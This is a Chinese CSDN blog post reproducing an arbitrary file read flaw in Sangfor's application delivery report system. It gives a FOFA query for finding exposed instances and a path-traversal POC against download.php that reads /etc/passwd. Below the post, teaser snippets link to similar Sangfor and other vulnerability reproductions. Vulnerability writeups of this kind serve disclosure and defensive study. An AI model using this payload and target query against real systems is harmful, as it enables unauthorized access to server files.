深信服应用交付报表任意文件读取漏洞

最新推荐文章于 2024-07-17 00:00:00 发布
最新推荐文章于 2024-07-17 00:00:00 发布
阅读量803 收藏
点赞数
文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pingan233/article/details/129436167
版权

深信服应用交付报表任意文件读取漏洞
1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
1.2.漏洞影响
1.3.FOFA
2.漏洞复现
2.1.登录页面
2.2.POC
1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
  深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。

1.2.漏洞影响
  深信服应用交付报表系统

1.3.FOFA
  app=“SANGFOR-应用交付报表系统”

2.漏洞复现
2.1.登录页面
在这里插入图片描述

 

2.2.POC

  这里通过抓包进行文件读取,当然也可以在页面中直接进行获取。

在这里插入图片描述

 

POC:/report/download.php?pdf=../../../../../etc/passwd
不会代码的靓仔关
关注
深信服应用交付报表系统存在任意文件读取漏洞
nnn2188185的博客
06-15 1121
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发深信服应用交付报表系统。
Jenkins CLI 任意文件读取漏洞复现(CVE-2024-23897)
0xSec
01-26 2545
Jenkins是一个开源CI/CD工具,用于自动化开发流程,包括构建、测试和部署软件。 2024年1月,互联网公开了一个Jenkins的任意文件读取漏洞。鉴于该漏洞易于利用,存在危害扩大的风险,且该系统数据较为敏感且影响范围广泛,建议所有使用Jenkins的企业尽快进行修复,以确保系统安全。
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
weixin_46801402的博客
11-04 2863
深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 323
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
深信服 应用交付报表系统 download.php 任意文件读取漏洞
weixin_46801402的博客
11-04 1306
深信服 应用交付报表系统 download.php 任意文件读取漏洞
深信服应用交付报表系统 命令执行漏洞复现
09-28 1577
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务。
I Doc View在线文档预览系统任意文件读取漏洞复现
0xSec
12-14 1467
iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞复现
0xSec
05-14 1634
联软安渡 UniNXG 安全数据交换系统 /UniExServices/poserver.zz 接口任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件,造成数据泄露,导致系统处于极不安全的状态。
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1382
​用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
深信服应用交付管理系统远程命令执行漏洞复现
薛定谔嘚喵博客
09-07 1262
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
03-18
深信服应用交付AD用户手册_V7.0.8R3-20201223.pdf
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 800
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
深信服 应用交付管理系统 login 存在远程命令执行漏洞
m0_52333295的博客
08-20 1167
深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。
深信服应用交付管理系统 login 远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-15 573
深信服应用交付管理系统 login 远程命令执行漏洞(含批量验证poc)
download.php漏洞,TEC-004-php文件下载任意文件读取漏洞修复
weixin_34254083的博客
03-11 299
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwdfunction download() {$u =$_GET['u'];// 描述: 任意文件读取漏洞修复 date: 2017年4月28日 下午4:13:39 bylwy$lenth=strrpos($u,'.')...
深信服应用交付报表系统任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 719
SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞读取设备中的指定路径文件
深信服应用交付 AD 存在远程命令执行漏洞 附POC
nnn2188185的博客
09-28 550
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
Adminer 4.6.2任意文件读取漏洞详解:防范与利用
Adminer≤4.6.2版本存在一个严重的任意文件读取漏洞,该漏洞主要源于MySQL的LOADDATAINFILE功能。Adminer是一个轻量级的Web端数据库管理工具,支持多种主流数据库如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,类似...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值